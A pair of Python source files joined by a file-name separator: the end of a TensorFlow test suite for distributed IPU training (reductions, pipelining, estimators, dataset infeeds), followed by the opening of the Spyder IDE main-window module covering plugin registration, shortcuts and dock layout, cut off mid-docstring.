job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer,
config=sess_config)
target = server.target
else:
target = None
return strategy, target, sess_config
def _test_reduction_in_compiled_cluster(self, task_id):
strategy, target, sess_config = self._create_test_objects()
with strategy.scope():
def device_fn(x):
y = x * x
# Test both without and with an explicit outside_compilation_scope.
sum_y = strategy.reduce(ReduceOp.SUM, y, axis=None)
z = sum_y * sum_y
with scopes.outside_compilation_scope():
sum_z = strategy.reduce(ReduceOp.SUM, z, axis=None)
return sum_z
inputs = array_ops.placeholder(dtype=np.float32, shape=())
with ipu_scope("/device:IPU:0"):
compiled_fn = ipu_compiler.compile(device_fn, inputs=[inputs])
config = IPUConfig()
config.auto_select_ipus = 1
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
with session_lib.Session(target=target, config=sess_config) as sess:
[out] = sess.run(compiled_fn, feed_dict={inputs: task_id + 1})
self.assertEqual(out, 50.0) # 2 * (1^2 + 2^2)^2
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_reduction_in_compiled_cluster(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_reduction_in_compiled_cluster,
cluster_spec)
def _test_optimizer_in_compiled_cluster(self, task_id):
strategy, target, sess_config = self._create_test_objects(
variables_on_host=False)
per_worker_x = [i + 1.0 for i in range(strategy.num_replicas_in_sync)]
x = per_worker_x[task_id]
initial_w = 2.0
learning_rate = 0.5
with strategy.scope():
def device_fn(features):
w = variable_scope.get_variable(name="w", initializer=initial_w)
loss = w * features
optimizer = GradientDescentOptimizer(learning_rate)
return optimizer.minimize(loss)
def compiled_fn():
return ipu_compiler.compile(device_fn, inputs=[x])
train_op = strategy.run(compiled_fn, args=[])
config = IPUConfig()
config.auto_select_ipus = 1
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
[w] = variables.global_variables()
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(w.initializer)
sess.run(train_op)
expected_w = initial_w - learning_rate * np.sum(per_worker_x)
self.assertEqual(expected_w, sess.run(w))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_optimizer_in_compiled_cluster(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_optimizer_in_compiled_cluster,
cluster_spec)
def _test_pipelining(self, task_id):
strategy, target, sess_config = self._create_test_objects(
variables_on_host=False)
cpu_device = "/job:worker/replica:0/task:{}/device:CPU:0".format(task_id)
ipu_device = "/job:worker/replica:0/task:{}/device:IPU:0".format(task_id)
per_worker_x = [i + 1.0 for i in range(strategy.num_replicas_in_sync)]
y = 1.0
initial_w0 = 1.0
initial_w1 = 2.0
learning_rate = 0.5
gradient_accumulation_count = 4
num_iterations = 4
repeat_count = 2
num_session_runs, remainder = divmod(num_iterations, repeat_count)
self.assertEqual(remainder, 0)
with strategy.scope():
x = per_worker_x[task_id]
features = [x] * num_iterations * gradient_accumulation_count
labels = [y] * num_iterations * gradient_accumulation_count
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def stage1(feature, label):
w0 = variable_scope.get_variable(name="w0", initializer=initial_w0)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(w0.device, ipu_device)
partial = w0 * feature
return partial, label
def stage2(partial, label):
w1 = variable_scope.get_variable(name="w1", initializer=initial_w1)
self.assertIsInstance(w1, IPUMirroredVariable)
self.assertEqual(w1.device, ipu_device)
prediction = partial + w1
loss = losses.mean_squared_error(label, prediction)
return loss
def optimizer_function(loss):
opt = GradientDescentOptimizer(learning_rate)
return pipelining_ops.OptimizerFunctionOutput(opt, loss)
def model():
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
gradient_accumulation_count=gradient_accumulation_count,
repeat_count=repeat_count,
inputs=[],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
optimizer_function=optimizer_function,
name="Pipeline")
return pipeline_op
def compiled_model():
return ipu_compiler.compile(model, inputs=[])
train_op = strategy.run(compiled_model, args=[])
config = IPUConfig()
config.auto_select_ipus = 2
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
expected_w0 = initial_w0
expected_w1 = initial_w1
w0, w1 = variables.global_variables()
self.assertEqual("w0:0", w0.name)
self.assertEqual("w1:0", w1.name)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
run_metadata = config_pb2.RunMetadata()
for i in range(num_session_runs):
if i < num_session_runs - 1:
sess.run(train_op)
else:
# Save execution trace for the last run.
options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
sess.run(train_op, options=options, run_metadata=run_metadata)
for _ in range(repeat_count):
# L(x) = sum_i (w_0 * x_i + w_1 - y)^2
# dL(x)/dw_0 = sum_i 2 (w_0 * x_i + w_1 - y) x_i
grad_w0 = sum(2 * (expected_w0 * x_i + expected_w1 - y) * x_i
for x_i in per_worker_x)
accumulated_grad_w0 = gradient_accumulation_count * grad_w0
# dL(x)/dw_1 = sum_i 2 (w_0 * x_i + w_1 - y)
grad_w1 = sum(2 * (expected_w0 * x_i + expected_w1 - y)
for x_i in per_worker_x)
accumulated_grad_w1 = gradient_accumulation_count * grad_w1
expected_w0 -= learning_rate * accumulated_grad_w0
expected_w1 -= learning_rate * accumulated_grad_w1
self.assertEqual(expected_w0, sess.run(w0))
self.assertEqual(expected_w1, sess.run(w1))
# Do some sanity checks on what actually executed the last iteration.
nodes_by_device = _get_executed_nodes_by_device(run_metadata)
cpu_nodes = nodes_by_device[cpu_device]
ipu_nodes = nodes_by_device[ipu_device]
# There should be 2 reductions on the CPU per repeat loop iteration
# (one for each gradient).
self.assertEqual(2 * repeat_count,
sum(1 for n in cpu_nodes if "CollectiveReduce" in n))
# There should be 1 XLA run on the IPU
self.assertEqual(1, sum(1 for n in ipu_nodes if "xla_run" in n))
@tu.test_may_use_ipus_or_model(num_ipus=4)
def test_pipelining(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_pipelining, cluster_spec)
def _run_pipelining_example_with_keras_layers(self,
strategy,
dataset,
gradient_accumulation_count,
sess_target=None,
sess_config=None):
loss_vals = []
# Start of verbatim copy of example from ipu_multi_worker_strategy.py.
with strategy.scope():
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu_outfeed_queue.IPUOutfeedQueue()
def stage1(lr, images, labels):
partial = keras.layers.Dense(256, activation="relu")(images)
partial = keras.layers.Dense(128, activation="relu")(partial)
return lr, partial, labels
def stage2(lr, partial, labels):
logits = keras.layers.Dense(10)(partial)
per_example_loss = keras.losses.sparse_categorical_crossentropy(
y_true=labels, y_pred=logits, from_logits=True)
# In a custom training loop, the optimiser does an allreduce *sum*, not
# average, of the gradients across the distributed workers. Therefore
# we want to divide the loss here by the *global* batch size, which is
# done by the `tf.nn.compute_average_loss()` function.
loss = nn.compute_average_loss(per_example_loss)
return lr, loss
def optimizer_function(lr, loss):
optimizer = GradientDescentOptimizer(lr)
return pipelining_ops.OptimizerFunctionOutput(optimizer, loss)
def model(lr):
pipeline_op = pipelining_ops.pipeline(
computational_stages=[stage1, stage2],
gradient_accumulation_count=gradient_accumulation_count,
inputs=[lr],
infeed_queue=infeed_queue,
outfeed_queue=outfeed_queue,
optimizer_function=optimizer_function,
name="Pipeline")
return pipeline_op
def compiled_model(lr):
with ipu_scope("/device:IPU:0"):
return ipu_compiler.compile(model, inputs=[lr])
with ops.device("cpu"):
lr = array_ops.placeholder(np.float32, [])
train_op = strategy.run(compiled_model, args=[lr])
_, per_worker_losses = outfeed_queue.dequeue()
# Mean across the local `gradient_accumulation_count` batches:
per_worker_loss = math_ops.reduce_mean(per_worker_losses)
# Global mean across the distributed workers (since it is already
# divided by the global batch size above, we do a sum here):
global_loss = strategy.reduce(ReduceOp.SUM, per_worker_loss)
config = IPUConfig()
config.auto_select_ipus = 2
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
ipu_utils.move_variable_initialization_to_cpu()
with session_lib.Session(target=sess_target, config=sess_config) as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
for _ in range(10):
sess.run(train_op, {lr: 0.01})
global_loss_val = sess.run(global_loss)
# End of example code.
if loss_vals:
# Check that the loss decreases monotonically.
self.assertLess(global_loss_val, loss_vals[-1])
loss_vals.append(global_loss_val)
sess.run(infeed_queue.deleter)
sess.run(outfeed_queue.deleter)
return loss_vals
def _test_pipelining_example_with_keras_layers(self, task_id):
gradient_accumulation_count = 4
local_batch_size = 2
num_workers = 2
features = [
i * np.ones((1, 20), dtype=np.float32) for i in range(num_workers)
]
labels = [i * np.ones(1, dtype=np.int32) for i in range(num_workers)]
concat_features = np.concatenate(features)
concat_labels = np.concatenate(labels)
def mock_initializer_get(_identifier):
return init_ops.GlorotUniform(seed=42)
with test.mock.patch.object(keras.initializers, 'get',
mock_initializer_get):
# Test using the default non-distributed strategy. Each batch is twice
# the size, with the batches for the workers concatenated.
default_strategy = distribution_strategy_context._get_default_strategy() # pylint: disable=protected-access
with ops.Graph().as_default():
concat_dataset = dataset_ops.Dataset.from_tensor_slices(
(concat_features, concat_labels))
concat_dataset = concat_dataset.repeat().batch(num_workers *
local_batch_size,
drop_remainder=True)
losses_reference = self._run_pipelining_example_with_keras_layers(
default_strategy, concat_dataset, gradient_accumulation_count)
# Test using the actual distribution strategy. Each worker gets its own batch.
strategy, sess_target, sess_config = self._create_test_objects(
variables_on_host=False)
with ops.Graph().as_default():
local_dataset = dataset_ops.Dataset.from_tensor_slices(
(features[task_id], labels[task_id]))
local_dataset = local_dataset.repeat().batch(local_batch_size,
drop_remainder=True)
losses_distributed = self._run_pipelining_example_with_keras_layers(
strategy, local_dataset, gradient_accumulation_count, sess_target,
sess_config)
# The resulting losses should be the same, as distributed training should in
# general be equivalent to non-distributed training with concatenated batches.
np.testing.assert_almost_equal(losses_reference,
losses_distributed,
decimal=6)
@tu.test_may_use_ipus_or_model(num_ipus=4)
def test_pipelining_example_with_keras_layers(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(
self._test_pipelining_example_with_keras_layers, cluster_spec)
def _test_ipu_pipeline_estimator(self, task_id):
# The estimator library starts the server when configured in TF_CONFIG.
strategy, _, _ = self._create_test_objects(start_server=False,
variables_on_host=False)
ipu_device = "/job:worker/replica:0/task:{}/device:IPU:0".format(task_id)
num_iterations = 3
num_workers = strategy.num_replicas_in_sync
per_worker_x = [i + 1.0 for i in range(num_workers)]
y = 1.0
initial_w0 = 1.0
initial_w1 = 2.0
learning_rate = 0.5
gradient_accumulation_count = 4
num_steps = num_iterations * gradient_accumulation_count
def my_model_fn(mode):
def stage1(feature, label):
w0 = variable_scope.get_variable(name="w0", initializer=initial_w0)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(w0.device, ipu_device)
partial = w0 * feature
return partial, label
def stage2(partial, label):
w1 = variable_scope.get_variable(name="w1", initializer=initial_w1)
self.assertIsInstance(w1, IPUMirroredVariable)
self.assertEqual(w1.device, ipu_device)
prediction = partial + w1
loss = losses.mean_squared_error(label, prediction)
return loss
def optimizer_function(loss):
# Use momentum, but set to zero, just to verify that the
# momentum accumulator "slot" does not cause any problems.
opt = MomentumOptimizer(learning_rate, momentum=0.0)
return pipelining_ops.OptimizerFunctionOutput(opt, loss)
return ipu_pipeline_estimator.IPUPipelineEstimatorSpec(
mode=mode,
computational_stages=[stage1, stage2],
gradient_accumulation_count=gradient_accumulation_count,
optimizer_function=optimizer_function)
def my_input_fn(input_context):
self.assertEqual(task_id, input_context.input_pipeline_id)
x = per_worker_x[task_id]
features = [x] * num_steps
labels = [y] * num_steps
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
return dataset
num_ipus_in_pipeline = 2
ipu_options = IPUConfig()
ipu_options.auto_select_ipus = num_ipus_in_pipeline
tu.add_hw_ci_connection_options(ipu_options)
config = ipu_run_config.RunConfig(
session_config=config_pb2.ConfigProto(allow_soft_placement=False),
train_distribute=strategy,
save_summary_steps=1,
ipu_run_config=ipu_run_config.IPURunConfig(
iterations_per_loop=gradient_accumulation_count,
num_shards=num_ipus_in_pipeline,
ipu_options=ipu_options))
estimator = ipu_pipeline_estimator.IPUPipelineEstimator(
model_fn=my_model_fn, config=config)
estimator_lib.train_and_evaluate(
estimator,
train_spec=estimator_lib.TrainSpec(input_fn=my_input_fn,
max_steps=num_steps),
eval_spec=estimator_lib.EvalSpec(input_fn=my_input_fn,
steps=num_steps))
expected_w0 = initial_w0
expected_w1 = initial_w1
expected_losses = []
for _ in range(num_iterations):
x = np.array(per_worker_x)
# The loss reduction op is decided by _get_loss_reduce_op_for_reporting()
loss = np.sum(np.square(expected_w0 * x + expected_w1 - y))
expected_losses.append(loss)
grad_w0 = np.sum(2 * (expected_w0 * x + expected_w1 - y) * x)
accumulated_grad_w0 = gradient_accumulation_count * grad_w0
grad_w1 = np.sum(2 * (expected_w0 * x + expected_w1 - y))
accumulated_grad_w1 = gradient_accumulation_count * grad_w1
expected_w0 -= learning_rate * accumulated_grad_w0 / num_workers
expected_w1 -= learning_rate * accumulated_grad_w1 / num_workers
# Only the chief worker has the checkpoint to read the variables from.
if task_id == 0:
self.assertEqual(num_steps, estimator.get_variable_value("global_step"))
self.assertEqual(expected_w0, estimator.get_variable_value("w0"))
self.assertEqual(expected_w1, estimator.get_variable_value("w1"))
loss_outputs = _get_summary_values(estimator.model_dir, "loss")
self.assertEqual(expected_losses, loss_outputs)
@tu.test_may_use_ipus_or_model(num_ipus=4)
def test_ipu_pipeline_estimator(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_ipu_pipeline_estimator,
cluster_spec)
def _test_dataset_infeed(self, task_id):
strategy, target, sess_config = self._create_test_objects()
with strategy.scope():
dataset = dataset_ops.Dataset.from_tensor_slices([0.0]).repeat()
# Test with a dataset host op.
dataset = dataset.map(lambda x: x + task_id)
infeed_queue = ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v += x
return v
def my_net():
r = loops.repeat(10, body, [0.0], infeed_queue)
return r
with ipu_scope("/device:IPU:0"):
[res] = ipu_compiler.compile(my_net, inputs=[])
config = IPUConfig()
config.auto_select_ipus = 1
tu.add_hw_ci_connection_options(config)
config.configure_ipu_system()
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(infeed_queue.initializer)
self.assertEqual(task_id * 10.0, sess.run(res))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_dataset_infeed(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_dataset_infeed, cluster_spec)
def _test_ipu_estimator(self, task_id):
# The estimator library starts the server when configured in TF_CONFIG.
strategy, _, _ = self._create_test_objects(start_server=False,
variables_on_host=False)
ipu_device = "/job:worker/replica:0/task:{}/device:IPU:0".format(task_id)
num_iterations = 3
num_workers = strategy.num_replicas_in_sync
per_worker_x = [i + 1.0 for i in range(num_workers)]
y = 1.0
initial_w0 = 1.0
initial_w1 = 2.0
learning_rate = 0.5
def my_model_fn(features, labels, mode):
w0 = variable_scope.get_variable(name="w0", initializer=initial_w0)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(w0.device, ipu_device)
partial = w0 * features
w1 = variable_scope.get_variable(name="w1", initializer=initial_w1)
self.assertIsInstance(w1, IPUMirroredVariable)
self.assertEqual(w1.device, ipu_device)
prediction = partial + w1
loss = losses.mean_squared_error(labels, prediction)
# Use momentum, but set to zero, just to verify that the
# momentum accumulator "slot" does not cause any problems.
opt = MomentumOptimizer(learning_rate, momentum=0.0)
train_op = opt.minimize(loss)
return ipu_estimator.IPUEstimatorSpec(mode=mode,
loss=loss,
train_op=train_op)
def my_input_fn(input_context):
self.assertEqual(task_id, input_context.input_pipeline_id)
x = per_worker_x[task_id]
features = [x] * num_iterations
labels = [y] * num_iterations
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
return dataset
ipu_options = IPUConfig()
ipu_options.auto_select_ipus = 1
tu.add_hw_ci_connection_options(ipu_options)
config = ipu_run_config.RunConfig(
session_config=config_pb2.ConfigProto(allow_soft_placement=False),
train_distribute=strategy,
save_summary_steps=1,
ipu_run_config=ipu_run_config.IPURunConfig(ipu_options=ipu_options))
estimator = ipu_estimator.IPUEstimator(model_fn=my_model_fn, config=config)
estimator_lib.train_and_evaluate(
estimator,
train_spec=estimator_lib.TrainSpec(input_fn=my_input_fn,
max_steps=num_iterations),
eval_spec=estimator_lib.EvalSpec(input_fn=my_input_fn))
expected_w0 = initial_w0
expected_w1 = initial_w1
expected_losses = []
for _ in range(num_iterations):
x = np.array(per_worker_x)
# The loss reduction op is decided by _get_loss_reduce_op_for_reporting()
loss = np.mean(np.square(expected_w0 * x + expected_w1 - y))
expected_losses.append(loss)
grad_w0 = np.sum(2 * (expected_w0 * x + expected_w1 - y) * x)
grad_w1 = np.sum(2 * (expected_w0 * x + expected_w1 - y))
expected_w0 -= learning_rate * grad_w0 / num_workers
expected_w1 -= learning_rate * grad_w1 / num_workers
# Only the chief worker has the checkpoint to read the variables from.
if task_id == 0:
self.assertEqual(num_iterations,
estimator.get_variable_value("global_step"))
self.assertEqual(expected_w0, estimator.get_variable_value("w0"))
self.assertEqual(expected_w1, estimator.get_variable_value("w1"))
loss_outputs = _get_summary_values(estimator.model_dir, "loss")
self.assertEqual(expected_losses, loss_outputs)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_ipu_estimator(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
self._run_workers_in_processes(self._test_ipu_estimator, cluster_spec)
if __name__ == "__main__":
test.main()
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import glob
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QIcon, QKeySequence
from qtpy.QtWidgets import (QAction, QApplication, QMainWindow, QMenu,
QMessageBox, QShortcut, QStyleFactory, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app import tour
from spyder.app.utils import (create_splash_screen, delete_lsp_log_files,
qt_message_handler, set_links_color,
setup_logging, set_opengl_implementation, Spy)
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
get_safe_mode, is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.utils.image_path_manager import get_image_path
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
from spyder.app.solver import (
find_external_plugins, find_internal_plugins, solve_plugin_dependencies)
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Keeping a reference to the original sys.exit before patching it
ORIGINAL_SYS_EXIT = sys.exit
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
# Set the index for the default tour
DEFAULT_TOUR = 0
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
if error:
raise SpyderAPIError(
'Plugin "{}" not found!'.format(plugin_name))
else:
return None
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.NAME] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.NAME] = plugin
else:
self._INTERNAL_PLUGINS[plugin.NAME] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
